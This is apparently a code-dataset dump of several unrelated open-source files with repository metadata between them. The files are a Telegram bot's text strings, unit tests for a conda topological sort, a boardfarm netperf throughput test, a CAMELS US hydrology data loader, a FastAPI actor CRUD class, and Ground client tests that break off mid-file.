class Translation(object): START_TEXT = """<b>Hai {}!!!</b> <code>Im Simple Telegraph Uploader Bot😜</code> <b>» You Must Join My Updates Channel for using me</b> <i>Click Help Button For More Details</i>""" HELP_TEXT = """<b>Hey {}!!!,Please Folow these Steps</b> ➥ <code>Send any Image, Gif or Video(Mp4 Only) below 5MB.</code> ➥ <code>Bot will send you the Telegra.ph link.</code> <b>Available Commands</b> /start - <b>Checking Bot Online</b> /help - <b>How To Use Me</b> /about - <b>More About Me</b>""" ABOUT_TEXT = """**➥ My Name** : ```Telegraph Bot``` **➥ Creator** : <a href=https://t.me/D_ar_k_Angel>Dark Angel</a> **➥ Credits** : ```Everyone in this journey``` **➥ Language** : ```Python3``` **➥ Library** : <a href=https://docs.pyrogram.org>Pyrogram asyncio 0.18.0</a> **➥ Server** : ```Heroku``` **➥ Build Status** : ```V01.1 [BETA]```"""
true
true
f729022dfa20b18a3e8cd789e227b05f928ecf4c
3,104
py
Python
tests/test_toposort.py
LaudateCorpus1/libconda
28d77a7506f76cbf537c1f0ddc947384cab15415
[ "BSD-3-Clause" ]
3
2018-01-05T20:27:44.000Z
2018-10-22T22:58:39.000Z
tests/test_toposort.py
conda/libconda
28d77a7506f76cbf537c1f0ddc947384cab15415
[ "BSD-3-Clause" ]
7
2016-07-22T15:21:20.000Z
2019-04-30T11:41:38.000Z
tests/test_toposort.py
LaudateCorpus1/libconda
28d77a7506f76cbf537c1f0ddc947384cab15415
[ "BSD-3-Clause" ]
9
2017-05-05T17:52:05.000Z
2021-08-23T05:42:10.000Z
import unittest from libconda.toposort import toposort, pop_key class TopoSortTests(unittest.TestCase): def test_pop_key(self): key = pop_key({'a':{'b', 'c'}, 'b':{'c'}}) self.assertEqual(key, 'b') key = pop_key({'a':{'b'}, 'b':{'c', 'a'}}) self.assertEqual(key, 'a') key = pop_key({'a':{'b'}, 'b':{'a'}}) self.assertEqual(key, 'a') def test_simple(self): data = {'a':'bc', 'b':'c'} results = toposort(data, safe=True) self.assertEqual(results, ['c', 'b', 'a']) results = toposort(data, safe=False) self.assertEqual(results, ['c', 'b', 'a']) def test_cycle(self): data = {'a':'b', 'b':'a'} with self.assertRaises(ValueError): toposort(data, False) results = toposort(data) # Results do not have an guaranteed order self.assertEqual(set(results), {'b', 'a'}) def test_cycle_best_effort(self): data = {'a':'bc', 'b':'c', '1':'2', '2':'1'} results = toposort(data) self.assertEqual(results[:3], ['c', 'b', 'a']) # Cycles come last # Results do not have an guaranteed order self.assertEqual(set(results[3:]), {'1', '2'}) def test_python_is_prioritized(self): """ This test checks a special invariant related to 'python' specifically. Python is part of a cycle (pip <--> python), which can cause it to be installed *after* packages that need python (possibly in post-install.sh). A special case in toposort() breaks the cycle, to ensure that python isn't installed too late. Here, we verify that it works. """ # This is the actual dependency graph for python (as of the time of this writing, anyway) data = {'python' : ['pip', 'openssl', 'readline', 'sqlite', 'tk', 'xz', 'zlib'], 'pip': ['python', 'setuptools', 'wheel'], 'setuptools' : ['python'], 'wheel' : ['python'], 'openssl' : [], 'readline' : [], 'sqlite' : [], 'tk' : [], 'xz' : [], 'zlib' : []} # Here are some extra pure-python libs, just for good measure. data.update({'psutil' : ['python'], 'greenlet' : ['python'], 'futures' : ['python'], 'six' : ['python']}) results = toposort(data) # Python always comes before things that need it! self.assertLess(results.index('python'), results.index('setuptools')) self.assertLess(results.index('python'), results.index('wheel')) self.assertLess(results.index('python'), results.index('pip')) self.assertLess(results.index('python'), results.index('psutil')) self.assertLess(results.index('python'), results.index('greenlet')) self.assertLess(results.index('python'), results.index('futures')) self.assertLess(results.index('python'), results.index('six')) if __name__ == '__main__': unittest.main()
36.952381
97
0.542526
import unittest from libconda.toposort import toposort, pop_key class TopoSortTests(unittest.TestCase): def test_pop_key(self): key = pop_key({'a':{'b', 'c'}, 'b':{'c'}}) self.assertEqual(key, 'b') key = pop_key({'a':{'b'}, 'b':{'c', 'a'}}) self.assertEqual(key, 'a') key = pop_key({'a':{'b'}, 'b':{'a'}}) self.assertEqual(key, 'a') def test_simple(self): data = {'a':'bc', 'b':'c'} results = toposort(data, safe=True) self.assertEqual(results, ['c', 'b', 'a']) results = toposort(data, safe=False) self.assertEqual(results, ['c', 'b', 'a']) def test_cycle(self): data = {'a':'b', 'b':'a'} with self.assertRaises(ValueError): toposort(data, False) results = toposort(data) self.assertEqual(set(results), {'b', 'a'}) def test_cycle_best_effort(self): data = {'a':'bc', 'b':'c', '1':'2', '2':'1'} results = toposort(data) self.assertEqual(results[:3], ['c', 'b', 'a']) self.assertEqual(set(results[3:]), {'1', '2'}) def test_python_is_prioritized(self): data = {'python' : ['pip', 'openssl', 'readline', 'sqlite', 'tk', 'xz', 'zlib'], 'pip': ['python', 'setuptools', 'wheel'], 'setuptools' : ['python'], 'wheel' : ['python'], 'openssl' : [], 'readline' : [], 'sqlite' : [], 'tk' : [], 'xz' : [], 'zlib' : []} data.update({'psutil' : ['python'], 'greenlet' : ['python'], 'futures' : ['python'], 'six' : ['python']}) results = toposort(data) self.assertLess(results.index('python'), results.index('setuptools')) self.assertLess(results.index('python'), results.index('wheel')) self.assertLess(results.index('python'), results.index('pip')) self.assertLess(results.index('python'), results.index('psutil')) self.assertLess(results.index('python'), results.index('greenlet')) self.assertLess(results.index('python'), results.index('futures')) self.assertLess(results.index('python'), results.index('six')) if __name__ == '__main__': unittest.main()
true
true
f729023ed17c72b9cb67e504b14c51bfc35a5b63
896
py
Python
boardfarm/tests/netperf_rfc2544.py
mattsm/boardfarm
100521fde1fb67536682cafecc2f91a6e2e8a6f8
[ "BSD-3-Clause-Clear" ]
40
2018-03-23T14:17:13.000Z
2022-02-05T05:59:41.000Z
boardfarm/tests/netperf_rfc2544.py
mattsm/boardfarm
100521fde1fb67536682cafecc2f91a6e2e8a6f8
[ "BSD-3-Clause-Clear" ]
1
2020-04-17T01:20:12.000Z
2020-04-20T20:42:00.000Z
boardfarm/tests/netperf_rfc2544.py
mattsm/boardfarm
100521fde1fb67536682cafecc2f91a6e2e8a6f8
[ "BSD-3-Clause-Clear" ]
9
2018-04-11T08:31:14.000Z
2020-08-06T14:55:35.000Z
# Copyright (c) 2015 # # All rights reserved. # # This file is distributed under the Clear BSD license. # The full text can be found in LICENSE in the root directory. from boardfarm.devices import prompt from boardfarm.tests import rootfs_boot class NetperfRFC2544(rootfs_boot.RootFSBootTest): '''Single test to simulate RFC2544''' def runTest(self): board = self.dev.board lan = self.dev.lan for sz in ["74", "128", "256", "512", "1024", "1280", "1518"]: print("running %s UDP test" % sz) lan.sendline( 'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz) lan.expect_exact( 'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz) lan.expect('UDP UNIDIRECTIONAL') lan.expect(prompt, timeout=90) board.sendline() board.expect(prompt)
32
75
0.592634
from boardfarm.devices import prompt from boardfarm.tests import rootfs_boot class NetperfRFC2544(rootfs_boot.RootFSBootTest): def runTest(self): board = self.dev.board lan = self.dev.lan for sz in ["74", "128", "256", "512", "1024", "1280", "1518"]: print("running %s UDP test" % sz) lan.sendline( 'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz) lan.expect_exact( 'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz) lan.expect('UDP UNIDIRECTIONAL') lan.expect(prompt, timeout=90) board.sendline() board.expect(prompt)
true
true
f72903ba078395125701457a4993dee528185b05
9,825
py
Python
neuralhydrology/datasetzoo/camelsus.py
visr/neuralhydrology
77f6c9214945c8e857e3b9545afe8470da751cab
[ "BSD-3-Clause" ]
null
null
null
neuralhydrology/datasetzoo/camelsus.py
visr/neuralhydrology
77f6c9214945c8e857e3b9545afe8470da751cab
[ "BSD-3-Clause" ]
null
null
null
neuralhydrology/datasetzoo/camelsus.py
visr/neuralhydrology
77f6c9214945c8e857e3b9545afe8470da751cab
[ "BSD-3-Clause" ]
null
null
null
from pathlib import Path from typing import Dict, List, Tuple, Union import numpy as np import pandas as pd import xarray from neuralhydrology.datasetzoo.basedataset import BaseDataset from neuralhydrology.utils.config import Config class CamelsUS(BaseDataset): """Data set class for the CAMELS US data set by [#]_ and [#]_. Parameters ---------- cfg : Config The run configuration. is_train : bool Defines if the dataset is used for training or evaluating. If True (training), means/stds for each feature are computed and stored to the run directory. If one-hot encoding is used, the mapping for the one-hot encoding is created and also stored to disk. If False, a `scaler` input is expected and similarly the `id_to_int` input if one-hot encoding is used. period : {'train', 'validation', 'test'} Defines the period for which the data will be loaded basin : str, optional If passed, the data for only this basin will be loaded. Otherwise the basin(s) are read from the appropriate basin file, corresponding to the `period`. additional_features : List[Dict[str, pd.DataFrame]], optional List of dictionaries, mapping from a basin id to a pandas DataFrame. This DataFrame will be added to the data loaded from the dataset and all columns are available as 'dynamic_inputs', 'static_inputs' and 'target_variables' id_to_int : Dict[str, int], optional If the config argument 'use_basin_id_encoding' is True in the config and period is either 'validation' or 'test', this input is required. It is a dictionary, mapping from basin id to an integer (the one-hot encoding). scaler : Dict[str, Union[pd.Series, xarray.DataArray]], optional If period is either 'validation' or 'test', this input is required. It contains the means and standard deviations for each feature and is stored to the run directory during training (train_data/train_data_scaler.p) References ---------- .. [#] A. J. Newman, M. P. Clark, K. Sampson, A. Wood, L. E. Hay, A. Bock, R. J. Viger, D. Blodgett, L. Brekke, J. R. Arnold, T. Hopson, and Q. Duan: Development of a large-sample watershed-scale hydrometeorological dataset for the contiguous USA: dataset characteristics and assessment of regional variability in hydrologic model performance. Hydrol. Earth Syst. Sci., 19, 209-223, doi:10.5194/hess-19-209-2015, 2015 .. [#] Addor, N., Newman, A. J., Mizukami, N. and Clark, M. P.: The CAMELS data set: catchment attributes and meteorology for large-sample studies, Hydrol. Earth Syst. Sci., 21, 5293-5313, doi:10.5194/hess-21-5293-2017, 2017. """ def __init__(self, cfg: Config, is_train: bool, period: str, basin: str = None, additional_features: List[Dict[str, pd.DataFrame]] = [], id_to_int: Dict[str, int] = {}, scaler: Dict[str, Union[pd.Series, xarray.DataArray]] = {}): super(CamelsUS, self).__init__(cfg=cfg, is_train=is_train, period=period, basin=basin, additional_features=additional_features, id_to_int=id_to_int, scaler=scaler) def _load_basin_data(self, basin: str) -> pd.DataFrame: """Load input and output data from text files.""" # get forcings dfs = [] for forcing in self.cfg.forcings: df, area = load_camels_us_forcings(self.cfg.data_dir, basin, forcing) # rename columns if len(self.cfg.forcings) > 1: df = df.rename(columns={col: f"{col}_{forcing}" for col in df.columns}) dfs.append(df) df = pd.concat(dfs, axis=1) # add discharge df['QObs(mm/d)'] = load_camels_us_discharge(self.cfg.data_dir, basin, area) # replace invalid discharge values by NaNs qobs_cols = [col for col in df.columns if "qobs" in col.lower()] for col in qobs_cols: df.loc[df[col] < 0, col] = np.nan return df def _load_attributes(self) -> pd.DataFrame: if self.cfg.camels_attributes: df = load_camels_us_attributes(self.cfg.data_dir, basins=self.basins) # remove all attributes not defined in the config drop_cols = [c for c in df.columns if c not in self.cfg.camels_attributes] df = df.drop(drop_cols, axis=1) return df def load_camels_us_attributes(data_dir: Path, basins: List[str] = []) -> pd.DataFrame: """Load CAMELS US attributes from the dataset provided by [#]_ Parameters ---------- data_dir : Path Path to the CAMELS US directory. This folder must contain a 'camels_attributes_v2.0' folder (the original data set) containing the corresponding txt files for each attribute group. basins : List[str], optional If passed, return only attributes for the basins specified in this list. Otherwise, the attributes of all basins are returned. Returns ------- pandas.DataFrame Basin-indexed DataFrame, containing the attributes as columns. References ---------- .. [#] Addor, N., Newman, A. J., Mizukami, N. and Clark, M. P.: The CAMELS data set: catchment attributes and meteorology for large-sample studies, Hydrol. Earth Syst. Sci., 21, 5293-5313, doi:10.5194/hess-21-5293-2017, 2017. """ attributes_path = Path(data_dir) / 'camels_attributes_v2.0' if not attributes_path.exists(): raise RuntimeError(f"Attribute folder not found at {attributes_path}") txt_files = attributes_path.glob('camels_*.txt') # Read-in attributes into one big dataframe dfs = [] for txt_file in txt_files: df_temp = pd.read_csv(txt_file, sep=';', header=0, dtype={'gauge_id': str}) df_temp = df_temp.set_index('gauge_id') dfs.append(df_temp) df = pd.concat(dfs, axis=1) # convert huc column to double digit strings df['huc'] = df['huc_02'].apply(lambda x: str(x).zfill(2)) df = df.drop('huc_02', axis=1) if basins: # drop rows of basins not contained in the passed list drop_basins = [b for b in df.index if b not in basins] df = df.drop(drop_basins, axis=0) return df def load_camels_us_forcings(data_dir: Path, basin: str, forcings: str) -> Tuple[pd.DataFrame, int]: """Load the forcing data for a basin of the CAMELS US data set. Parameters ---------- data_dir : Path Path to the CAMELS US directory. This folder must contain a 'basin_mean_forcing' folder containing one subdirectory for each forcing. The forcing directories have to contain 18 subdirectories (for the 18 HUCS) as in the original CAMELS data set. In each HUC folder are the forcing files (.txt), starting with the 8-digit basin id. basin : str 8-digit USGS identifier of the basin. forcings : str Can be e.g. 'daymet' or 'nldas', etc. Must match the folder names in the 'basin_mean_forcing' directory. Returns ------- pd.DataFrame Time-indexed DataFrame, containing the forcing data. int Catchment area (m2), specified in the header of the forcing file. """ forcing_path = data_dir / 'basin_mean_forcing' / forcings if not forcing_path.is_dir(): raise OSError(f"{forcing_path} does not exist") files = list(forcing_path.glob('**/*_forcing_leap.txt')) file_path = [f for f in files if f.name[:8] == basin] if file_path: file_path = file_path[0] else: raise FileNotFoundError(f'No file for Basin {basin} at {file_path}') df = pd.read_csv(file_path, sep='\s+', header=3) df["date"] = pd.to_datetime(df.Year.map(str) + "/" + df.Mnth.map(str) + "/" + df.Day.map(str), format="%Y/%m/%d") df = df.set_index("date") # load area from header with open(file_path, 'r') as fp: content = fp.readlines() area = int(content[2]) return df, area def load_camels_us_discharge(data_dir: Path, basin: str, area: int) -> pd.Series: """Load the discharge data for a basin of the CAMELS US data set. Parameters ---------- data_dir : Path Path to the CAMELS US directory. This folder must contain a 'usgs_streamflow' folder with 18 subdirectories (for the 18 HUCS) as in the original CAMELS data set. In each HUC folder are the discharge files (.txt), starting with the 8-digit basin id. basin : str 8-digit USGS identifier of the basin. area : int Catchment area (m2), used to normalize the discharge. Returns ------- pd.Series Time-index pandas.Series of the discharge values (mm/day) """ discharge_path = data_dir / 'usgs_streamflow' files = list(discharge_path.glob('**/*_streamflow_qc.txt')) file_path = [f for f in files if f.name[:8] == basin] if file_path: file_path = file_path[0] else: raise FileNotFoundError(f'No file for Basin {basin} at {file_path}') col_names = ['basin', 'Year', 'Mnth', 'Day', 'QObs', 'flag'] df = pd.read_csv(file_path, sep='\s+', header=None, names=col_names) df["date"] = pd.to_datetime(df.Year.map(str) + "/" + df.Mnth.map(str) + "/" + df.Day.map(str), format="%Y/%m/%d") df = df.set_index("date") # normalize discharge from cubic feed per second to mm per day df.QObs = 28316846.592 * df.QObs * 86400 / (area * 10**6) return df.QObs
41.631356
120
0.63084
from pathlib import Path from typing import Dict, List, Tuple, Union import numpy as np import pandas as pd import xarray from neuralhydrology.datasetzoo.basedataset import BaseDataset from neuralhydrology.utils.config import Config class CamelsUS(BaseDataset): def __init__(self, cfg: Config, is_train: bool, period: str, basin: str = None, additional_features: List[Dict[str, pd.DataFrame]] = [], id_to_int: Dict[str, int] = {}, scaler: Dict[str, Union[pd.Series, xarray.DataArray]] = {}): super(CamelsUS, self).__init__(cfg=cfg, is_train=is_train, period=period, basin=basin, additional_features=additional_features, id_to_int=id_to_int, scaler=scaler) def _load_basin_data(self, basin: str) -> pd.DataFrame: dfs = [] for forcing in self.cfg.forcings: df, area = load_camels_us_forcings(self.cfg.data_dir, basin, forcing) if len(self.cfg.forcings) > 1: df = df.rename(columns={col: f"{col}_{forcing}" for col in df.columns}) dfs.append(df) df = pd.concat(dfs, axis=1) df['QObs(mm/d)'] = load_camels_us_discharge(self.cfg.data_dir, basin, area) qobs_cols = [col for col in df.columns if "qobs" in col.lower()] for col in qobs_cols: df.loc[df[col] < 0, col] = np.nan return df def _load_attributes(self) -> pd.DataFrame: if self.cfg.camels_attributes: df = load_camels_us_attributes(self.cfg.data_dir, basins=self.basins) drop_cols = [c for c in df.columns if c not in self.cfg.camels_attributes] df = df.drop(drop_cols, axis=1) return df def load_camels_us_attributes(data_dir: Path, basins: List[str] = []) -> pd.DataFrame: attributes_path = Path(data_dir) / 'camels_attributes_v2.0' if not attributes_path.exists(): raise RuntimeError(f"Attribute folder not found at {attributes_path}") txt_files = attributes_path.glob('camels_*.txt') dfs = [] for txt_file in txt_files: df_temp = pd.read_csv(txt_file, sep=';', header=0, dtype={'gauge_id': str}) df_temp = df_temp.set_index('gauge_id') dfs.append(df_temp) df = pd.concat(dfs, axis=1) df['huc'] = df['huc_02'].apply(lambda x: str(x).zfill(2)) df = df.drop('huc_02', axis=1) if basins: drop_basins = [b for b in df.index if b not in basins] df = df.drop(drop_basins, axis=0) return df def load_camels_us_forcings(data_dir: Path, basin: str, forcings: str) -> Tuple[pd.DataFrame, int]: forcing_path = data_dir / 'basin_mean_forcing' / forcings if not forcing_path.is_dir(): raise OSError(f"{forcing_path} does not exist") files = list(forcing_path.glob('**/*_forcing_leap.txt')) file_path = [f for f in files if f.name[:8] == basin] if file_path: file_path = file_path[0] else: raise FileNotFoundError(f'No file for Basin {basin} at {file_path}') df = pd.read_csv(file_path, sep='\s+', header=3) df["date"] = pd.to_datetime(df.Year.map(str) + "/" + df.Mnth.map(str) + "/" + df.Day.map(str), format="%Y/%m/%d") df = df.set_index("date") with open(file_path, 'r') as fp: content = fp.readlines() area = int(content[2]) return df, area def load_camels_us_discharge(data_dir: Path, basin: str, area: int) -> pd.Series: discharge_path = data_dir / 'usgs_streamflow' files = list(discharge_path.glob('**/*_streamflow_qc.txt')) file_path = [f for f in files if f.name[:8] == basin] if file_path: file_path = file_path[0] else: raise FileNotFoundError(f'No file for Basin {basin} at {file_path}') col_names = ['basin', 'Year', 'Mnth', 'Day', 'QObs', 'flag'] df = pd.read_csv(file_path, sep='\s+', header=None, names=col_names) df["date"] = pd.to_datetime(df.Year.map(str) + "/" + df.Mnth.map(str) + "/" + df.Day.map(str), format="%Y/%m/%d") df = df.set_index("date") df.QObs = 28316846.592 * df.QObs * 86400 / (area * 10**6) return df.QObs
true
true
f72903d52ab156ace0f6587404165e6f3dd3d608
754
py
Python
app/crud/crud_actor.py
luovkle/FastAPI-Movie-Manager
716eeb66a63a47488c4f3fa390321361fd94dbc6
[ "MIT" ]
null
null
null
app/crud/crud_actor.py
luovkle/FastAPI-Movie-Manager
716eeb66a63a47488c4f3fa390321361fd94dbc6
[ "MIT" ]
null
null
null
app/crud/crud_actor.py
luovkle/FastAPI-Movie-Manager
716eeb66a63a47488c4f3fa390321361fd94dbc6
[ "MIT" ]
null
null
null
from typing import Optional from sqlalchemy.orm import Session from app.models.actor import Actor from app.schemas.actor import ActorCreate, ActorInDB from app.core.exceptions import exceptions class CRUDActor: def get_by_name(self, db: Session, name: str) -> Optional[Actor]: return db.query(Actor).filter(Actor.name == name).first() def create(self, db: Session, actor_create: ActorCreate) -> Actor: if self.get_by_name(db, actor_create.name): raise exceptions.NAME_NOT_AVAILABLE actor_in_db = ActorInDB(**actor_create.dict()) actor_obj = Actor(**actor_in_db.dict()) db.add(actor_obj) db.commit() db.refresh(actor_obj) return actor_obj crud_actor = CRUDActor()
29
70
0.696286
from typing import Optional from sqlalchemy.orm import Session from app.models.actor import Actor from app.schemas.actor import ActorCreate, ActorInDB from app.core.exceptions import exceptions class CRUDActor: def get_by_name(self, db: Session, name: str) -> Optional[Actor]: return db.query(Actor).filter(Actor.name == name).first() def create(self, db: Session, actor_create: ActorCreate) -> Actor: if self.get_by_name(db, actor_create.name): raise exceptions.NAME_NOT_AVAILABLE actor_in_db = ActorInDB(**actor_create.dict()) actor_obj = Actor(**actor_in_db.dict()) db.add(actor_obj) db.commit() db.refresh(actor_obj) return actor_obj crud_actor = CRUDActor()
true
true
f72903f757a2aae5f78e0e7be21844fecc72d6ad
153
py
Python
src/poetry/console/exceptions.py
hadialqattan/poetry
02444308831358c26595c0f36ea263a3e02cb5d4
[ "MIT" ]
2
2022-01-15T20:22:15.000Z
2022-01-16T09:17:11.000Z
src/poetry/console/exceptions.py
hadialqattan/poetry
02444308831358c26595c0f36ea263a3e02cb5d4
[ "MIT" ]
1
2022-02-22T05:52:32.000Z
2022-02-22T05:52:32.000Z
src/poetry/console/exceptions.py
hadialqattan/poetry
02444308831358c26595c0f36ea263a3e02cb5d4
[ "MIT" ]
1
2022-03-19T12:13:53.000Z
2022-03-19T12:13:53.000Z
from __future__ import annotations from cleo.exceptions import CleoSimpleException class PoetrySimpleConsoleException(CleoSimpleException): pass
17
56
0.849673
from __future__ import annotations from cleo.exceptions import CleoSimpleException class PoetrySimpleConsoleException(CleoSimpleException): pass
true
true
f72904a7ccce5bbd9512c0085594cb8f444db9ba
17,865
py
Python
python/tests/test_client.py
ground-context/grit
3edd0a6c3ec2797fcd090690d6075db0c1965f5f
[ "Apache-2.0" ]
1
2018-03-01T03:29:17.000Z
2018-03-01T03:29:17.000Z
python/tests/test_client.py
ground-context/grit
3edd0a6c3ec2797fcd090690d6075db0c1965f5f
[ "Apache-2.0" ]
1
2018-03-22T16:57:55.000Z
2018-03-22T16:57:55.000Z
python/tests/test_client.py
ground-context/grit
3edd0a6c3ec2797fcd090690d6075db0c1965f5f
[ "Apache-2.0" ]
2
2018-11-20T19:53:16.000Z
2021-02-25T15:48:46.000Z
import unittest import uuid import ground.client as client class TestClient(unittest.TestCase): @classmethod def setUpClass(cls): cls.client = client.GroundClient() def test_node(self): """ Tests most of the node access methods """ source_key = uuid.uuid4().hex node = self.client.create_node(source_key, source_key) # test created node is valid self.assertTrue( node is not None, msg="create_node with source_key = {} returned None instead of a node" .format(source_key) ) self.assertTrue( source_key == node.get_source_key(), msg="node created with source key {} has a differing source key: {}" .format(source_key, node.get_source_key()) ) retrieved_node = self.client.get_node(source_key) # test retrieved node_version is valid self.assertTrue( retrieved_node is not None, msg='valid call to get_node returned None' ) self.assertTrue( retrieved_node == node, msg='valid call to get_node returned incorrect data' ) node_version = self.client.create_node_version(node.get_id()) # test created node_version is valid self.assertTrue( node_version is not None, msg='create_node_version with node_id={} returned None instead of a node version' .format(node.get_id()) ) self.assertTrue( node_version.get_node_id() == node.get_id(), msg="created node_version's node_id does not match id of node" ) retrieved_nv = self.client.get_node_version(node_version.get_id()) # test retrieved node_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_node_version returned None' ) self.assertTrue( retrieved_nv == node_version, msg='valid call to get_node_version returned incorrect data' ) latest = self.client.get_node_latest_versions(source_key) # test latest_version matches created node_version self.assertTrue( latest == [node_version.get_id()], msg="get_node_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_node_history(source_key) # expected_history = { # '0': [node_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_node_history did not match expected value" # ) def test_graph(self): """ Tests most of the node access methods """ source_key = uuid.uuid4().hex graph = self.client.create_graph(source_key, source_key) # test created graph is valid self.assertTrue( graph is not None, msg="create_graph with source_key = {} returned None instead of a graph" .format(source_key) ) self.assertTrue( source_key == graph.get_source_key(), msg="graph created with source key {} has a differing source key: {}" .format(source_key, graph.get_source_key()) ) retrieved_graph = self.client.get_graph(source_key) # test retrieved graph_version is valid self.assertTrue( retrieved_graph is not None, msg='valid call to get_graph returned None' ) self.assertTrue( retrieved_graph == graph, msg='valid call to get_graph returned incorrect data' ) graph_version = self.client.create_graph_version(graph.get_id(), []) # test created graph_version is valid self.assertTrue( graph_version is not None, msg='create_graph_version with graph_id={} returned None instead of a graph version' .format(graph.get_id()) ) self.assertTrue( graph_version.get_graph_id() == graph.get_id(), msg="created graph_version's graph_id does not match id of graph" ) retrieved_gv = self.client.get_graph_version(graph_version.get_id()) # test retrieved graph_version is valid self.assertTrue( retrieved_gv is not None, msg='valid call to get_graph_version returned None' ) self.assertTrue( retrieved_gv == graph_version, msg='valid call to get_graph_version returned incorrect data' ) latest = self.client.get_graph_latest_versions(source_key) # test latest_version matches created graph_version self.assertTrue( latest == [graph_version.get_id()], msg="get_graph_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_graph_history(source_key) # expected_history = { # '0': [graph_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_graph_history did not match expected value" # ) def test_edge(self): """ Tests most of the node access methods """ # create nodes/nodeversions for edges node1_source_key = uuid.uuid4().hex node2_source_key = uuid.uuid4().hex node1 = self.client.create_node(node1_source_key, node1_source_key) node2 = self.client.create_node(node2_source_key, node2_source_key) nv1 = self.client.create_node_version(node1.get_id()) nv2 = self.client.create_node_version(node2.get_id()) source_key = uuid.uuid4().hex edge = self.client.create_edge(source_key, source_key, node1.get_id(), node2.get_id()) # test created edge is valid self.assertTrue( edge is not None, msg="create_edge with source_key = {} returned None instead of a edge" .format(source_key) ) self.assertTrue( source_key == edge.get_source_key(), msg="edge created with source key {} has a differing source key: {}" .format(source_key, edge.get_source_key()) ) retrieved_edge = self.client.get_edge(source_key) # test retrieved edge_version is valid self.assertTrue( retrieved_edge is not None, msg='valid call to get_edge returned None' ) self.assertTrue( retrieved_edge == edge, msg='valid call to get_edge returned incorrect data' ) edge_version = self.client.create_edge_version(edge.get_id(), nv1.get_id(), nv2.get_id()) # test created edge_version is valid self.assertTrue( edge_version is not None, msg='create_edge_version with edge_id={} returned None instead of a edge version' .format(edge.get_id()) ) self.assertTrue( edge_version.get_edge_id() == edge.get_id(), msg="created edge_version's edge_id does not match id of edge" ) retrieved_nv = self.client.get_edge_version(edge_version.get_id()) # test retrieved edge_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_edge_version returned None' ) self.assertTrue( retrieved_nv == edge_version, msg='valid call to get_edge_version returned incorrect data' ) latest = self.client.get_edge_latest_versions(source_key) # test latest_version matches created edge_version self.assertTrue( latest == [edge_version.get_id()], msg="get_edge_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_edge_history(source_key) # expected_history = { # '0': [edge_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_edge_history did not match expected value" # ) def test_structure(self): """ Tests most of the node access methods """ source_key = uuid.uuid4().hex structure = self.client.create_structure(source_key, source_key) # test created structure is valid self.assertTrue( structure is not None, msg="create_structure with source_key = {} returned None instead of a structure" .format(source_key) ) self.assertTrue( source_key == structure.get_source_key(), msg="structure created with source key {} has a differing source key: {}" .format(source_key, structure.get_source_key()) ) retrieved_structure = self.client.get_structure(source_key) # test retrieved structure_version is valid self.assertTrue( retrieved_structure is not None, msg='valid call to get_structure returned None' ) self.assertTrue( retrieved_structure == structure, msg='valid call to get_structure returned incorrect data' ) structure_version = self.client.create_structure_version(structure.get_id(), {}) # test created structure_version is valid self.assertTrue( structure_version is not None, msg='create_structure_version with structure_id={} returned None instead of a structure version' .format(structure.get_id()) ) self.assertTrue( structure_version.get_structure_id() == structure.get_id(), msg="created structure_version's structure_id does not match id of structure" ) retrieved_nv = self.client.get_structure_version(structure_version.get_id()) # test retrieved structure_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_structure_version returned None' ) self.assertTrue( retrieved_nv == structure_version, msg='valid call to get_structure_version returned incorrect data' ) latest = self.client.get_structure_latest_versions(source_key) # test latest_version matches created structure_version self.assertTrue( latest == [structure_version.get_id()], msg="get_structure_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_structure_history(source_key) # expected_history = { # '0': [structure_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_structure_history did not match expected value" # ) def test_lineage_edge(self): """ Tests most of the node access methods """ # create rich versions aka node versions node1_source_key = uuid.uuid4().hex node2_source_key = uuid.uuid4().hex node1 = self.client.create_node(node1_source_key, node1_source_key) node2 = self.client.create_node(node2_source_key, node2_source_key) nv1 = self.client.create_node_version(node1.get_id()) nv2 = self.client.create_node_version(node2.get_id()) source_key = uuid.uuid4().hex lineage_edge = self.client.create_lineage_edge(source_key, source_key) # test created lineage_edge is valid self.assertTrue( lineage_edge is not None, msg="create_lineage_edge with source_key = {} returned None instead of a lineage_edge" .format(source_key) ) self.assertTrue( source_key == lineage_edge.get_source_key(), msg="lineage_edge created with source key {} has a differing source key: {}" .format(source_key, lineage_edge.get_source_key()) ) retrieved_lineage_edge = self.client.get_lineage_edge(source_key) # test retrieved lineage_edge_version is valid self.assertTrue( retrieved_lineage_edge is not None, msg='valid call to get_lineage_edge returned None' ) self.assertTrue( retrieved_lineage_edge == lineage_edge, msg='valid call to get_lineage_edge returned incorrect data' ) lineage_edge_version = self.client.create_lineage_edge_version( lineage_edge.get_id(), nv1.get_id(), nv2.get_id() ) # test created lineage_edge_version is valid self.assertTrue( lineage_edge_version is not None, msg='create_lineage_edge_version with lineage_edge_id={} returned None instead of a lineage_edge version' .format(lineage_edge.get_id()) ) self.assertTrue( lineage_edge_version.get_lineage_edge_id() == lineage_edge.get_id(), msg="created lineage_edge_version's lineage_edge_id does not match id of lineage_edge" ) retrieved_nv = self.client.get_lineage_edge_version(lineage_edge_version.get_id()) # test retrieved lineage_edge_version is valid self.assertTrue( retrieved_nv is not None, msg='valid call to get_lineage_edge_version returned None' ) self.assertTrue( retrieved_nv == lineage_edge_version, msg='valid call to get_lineage_edge_version returned incorrect data' ) latest = self.client.get_lineage_edge_latest_versions(source_key) # test latest_version matches created lineage_edge_version self.assertTrue( latest == [lineage_edge_version.get_id()], msg="get_lineage_edge_latest_version returns incorrect versions" ) # TODO: uncomment when server side bug fixed # history = self.client.get_lineage_edge_history(source_key) # expected_history = { # '0': [lineage_edge_version.get_id()] # } # self.assertTrue( # history == expected_history, # "call to get_lineage_edge_history did not match expected value" # ) def test_lineage_graph(self): """ 